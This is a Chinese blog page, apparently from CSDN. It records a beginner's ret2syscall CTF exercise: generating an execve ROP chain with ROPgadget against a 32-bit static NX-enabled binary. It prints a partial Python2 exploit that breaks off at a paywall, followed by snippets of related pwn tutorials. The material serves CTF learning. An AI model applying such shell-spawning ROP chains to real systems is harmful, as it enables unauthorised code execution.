pwn ret2syscall

最新推荐文章于 2025-05-07 20:10:29 发布
最新推荐文章于 2025-05-07 20:10:29 发布
阅读量1k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42841269/article/details/104263242
版权
本文记录了作者在学习pwn技术时关于ret2syscall的实践过程,通过gdb+pwndbg进行调试,并尝试解决XCTF攻防世界的基础题目。虽然文章主要侧重于实践操作,未深入探讨ret2syscall的原理,但提到了32位静态链接程序开启NX保护的情况,以及如何使用ropgadget生成ropchain。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南

这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。

查看一下文件的基本信息

在这里插入图片描述32位静态链接的程序,开启了NX保护。

由于是静态链接的,所以我们可以使用ropgadget工具生成一个ropchain

命令为:ROPgadget --binary rop --ropchain (rop为文件名)

在这里插入图片描述
完整的exp为

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''

p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb196) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0809a4ad) # mo
最低0.47元/天 解锁文章
YouNgFreshq
关注
ret2syscall
shi789789789的博客
05-26 698
博客网址:点击这里 微信:18223081347 欢迎加群聊天 :452380935 这一次我们来深入分析下更难的栈溢出题目ret2syscall 首先还是先检查下的保护 [*] '/home/pwn/桌面/题目/ROP/ret2syscall' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No .
ROP链:ret2syscall
小龙在线
09-13 461
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
PWN基础-ROP技术-ret2syscall突破NX保护
最新发布
Welcome To Myon'Blog !
05-07 372
我们 ret2syscall 实际还是希望调用 execve,和 ret2shellcode 类似,只是多了堆栈不可执行。后面我们会继续发送内容(/bin/sh)给 read 函数,读取到 bss_addr。我们继续调用 execve,其 32 位系统调用号是 11,即 0xb。没有找到,因此我们后面需要手动将 /bin/sh 写到 bss 段。我们先系统调用 read,其 32 位系统调用号是 3,即 0x3。接下来我们找 /bin/sh 字符串的地址。32 位程序,小端序,开启了 NX 保护。
ret2syscallpwn第二课)
s5555555___的博客
02-20 1861
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3812
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn07.ret2syscall例题
11-11
ret2syscall例题
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1406
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2967
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
Pwn学习-ret2syscall
cdl10000的博客
11-04 164
M1调pwn环境太难了,新手学pwn中。一路踩坑,一路学。
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 1012
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3196
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ROP-基础-ret2syscall
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1HBR7_yuCsP8awm_QNHTdAQ 提取码:uxt8 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled ...
pwn ret2system
03-03
### ret2system 漏洞利用技术详解 #### 背景介绍 ret2system是一种基于返回导向编程(ROP)的技术,通常用于绕过不可执行堆栈保护机制。这种攻击方式依赖于调用`system()`函数来执行命令或启动shell[^1]。 #### 原理说明 当存在缓冲区溢出漏洞时,如果程序中已经包含了对`system()`函数的合法调用,则可以直接覆盖返回地址指向该处。由于`system()`接受一个参数作为要执行的命令字符串,因此还需要找到这个字符串在内存中的位置并将其传递给`system()`. 如果目标进程中恰好有"/bin/sh"这样的字符串,那么就可以构造payload使得`system("/bin/sh")`被执行从而获得交互式的shell. 但是,在很多情况下,直接找到合适的`system()`调用并不容易实现。此时可以考虑寻找其他可能的方法: - **间接调用**:即使没有现成的`system()`调用路径,也可以尝试通过修改寄存器值或其他手段间接达到相同效果。 - **自定义输入**:有时可以通过精心设计的数据输入让程序自己创建所需的环境变量或者文件描述符等资源,进而触发期望的操作。 对于具体案例提到的情况——即发现了`gets()`导致的栈溢出但未能定位到`system("/bin/sh")`—这表明虽然具备基本条件但仍需进一步探索可用 gadge t 或者创造性的方法去完成整个链条构建[^2]. ```c // 示例代码片段展示如何构造 payload 来利用 ret2system 漏洞 (假设已知 system 地址 和 "/bin/sh" 字符串的位置) char *args[] = {"/bin/sh", NULL}; void (*sys)(const char *) = &system; // 获取 system 函数指针 (*sys)("echo 'Hello from ret2system!'"); ``` 值得注意的是,上述讨论仅限于理论层面的研究探讨;任何未经授权的实际操作均属违法行为,并违反道德准则。安全研究人员应当始终遵循法律法规以及职业操守的要求开展工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值